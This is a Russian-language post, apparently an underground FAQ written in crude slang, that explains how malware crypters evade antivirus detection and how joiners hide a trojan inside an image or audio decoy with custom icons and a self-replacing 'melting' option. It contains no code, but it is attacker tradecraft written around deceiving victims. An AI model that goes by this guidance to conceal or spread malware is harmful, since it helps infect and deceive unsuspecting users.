Хорошие крипторы работают очень просто, быстро и надёжно, хоть и не безглючно. Они дописывают свой код (в контексте таких крипторов этот код называется стабом) в криптуемую программу и шифруют код самой программы. При запуске первым стартует стаб, он восстанавливает оригинальный код и программа начинает работать. Если криптор свежий (или просто хороший, об этом ниже), то закриптованная программа не будет детектироваться антивирусами.

Чаще всего такие крипторы полиморфны — т.е. код криптора в криптуемой программе каждый раз уникален, заполнен случайными инструкциями и бессмысленными вызовами функций API. Такие крипторы достаточно долго остаются недетектируемыми в силу уникальности каждого закриптованного файла. Но, как говорится, на каждую хитрую жопу найдется хуй с винтом — такие крипторы тоже со временем детектируются, и если автор не чистит свой продукт, то криптор перестает быть уникальным и посылается нахуй.

Другим же типом крипторов являются стабовые крипторы. Вообще только дебил будет называть это криптором, но в силу ебанутости и многочисленности авторов таких творений, мы не будем отрываться от стаи.

Итак, быдлокрипторы. Суть их работы вот в чем — есть стаб. Стаб в этом случае — это отдельная программа, к которой цепляется криптуемый файл. При запуске файл извлекается, расшифровывается и запускается.

Т.е. надеюсь поняли отличия в первом случае шифруется код программы, и стаб расшифровывает уже команды программы, а во втором случае шифруется сам файл программы и расшифровывается тоже сам файл, ну и понятно, что второй тип криптора это не что иное как не нужное гавно, т.к. практически любой антивирусник спалит вирус при расшифровке ! 😉

Некоторые крипторы напрямую файл на диск не пишут, а запускают его из памяти, но это их не оправдывает, т.к. продвинутый антивирус словит это при запуске как нехуй делать.
В таких крипторах уникальность каждого закриптованного файла достигается разными стабами. Но такой подход весьма ограничен — в хороших криптах это всего-лишь код, и его можно сгенерировать, а со стабами в говно-крипторах уже сложнее, поэтому авторы чаще всего создают под каждого клиента отдельный стаб. Подход глуп до безобразия, ведь ежели спалится антивирусами один закриптованный файл — за ним полетят и все остальные.

С крипторами пока всё, идём дальше…

2)Что такое джойнеры и зачем нужно:

Джоинер (также биндер, joiner, binder) — программа для склеивания нескольких файлов (к примеру картинки в формате JPG и трояна в виде исполняемого файла EXE) в один контейнер. При запуске контейнер извлекает из себя файлы и запускает их.
Чаще всего джоинеры используются для маскировки запуска вредоносных программ. Простейший вариант использования описан выше — склеиваем фотографию с вирусом. В итоге жертва запускает контейнер, видит фотку, а тем временем запускается троян и делает свое дело.

Джоинеры бывают разные, крутые и не очень. Некоторые позволяют настраивать множество опций — куда контейнер будет извлекать файлы (иногда это важно), будет он запускать файлы скрыто или по-обычному (т.е. если программа имеет окна — при запуске они будут видны, в скрытом режиме запуска никаких окон видно не будет, даже если автором программы это было задумано) и т.д.

Также большинство джоинеров позволяет настраивать внешний вид контейнера — иконку, информацию о версии и т.п.

Все, абсолютно все джоинеры создают контейнеры в виде исполняемых файлов EXE. Т.е. вариант склеить изображение с трояном и получить файл jpg — невозможно. Данный вопрос периодически поднимается на форумах, но увы — решения нет. Также некоторые джоинеры позволяют создавать контейнеры с расширением scr, pif и com — но контейнер все-равно остается EXE’шником.

В некоторых джоинерах есть опция мелтинга, о ней стоит рассказать подробнее. Во многих случаях она очень полезна. Суть вот в чем: при создании контейнера мы выбираем один из склеиваемых файлов. При запуске контейнера файлы извлекаются и запускаются, как и положено. И если мелтинг был включен и один из склеиваемых файлов был выбран — при запуске контейнер заменит себя выбранным файлом.

Да, немного запутанно, на примере будет проще: склеиваем песенку с трояном, выбираем в настройках мелтинга файл песни, и для пущего эффекта прикрепим к контейнеру иконку аудио-файла. При запуске контейнер извлечет оба файла, запустит их и заменит себя песенкой.

Источник: По материалам фака от Вазонеза (vazonez.com)




Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *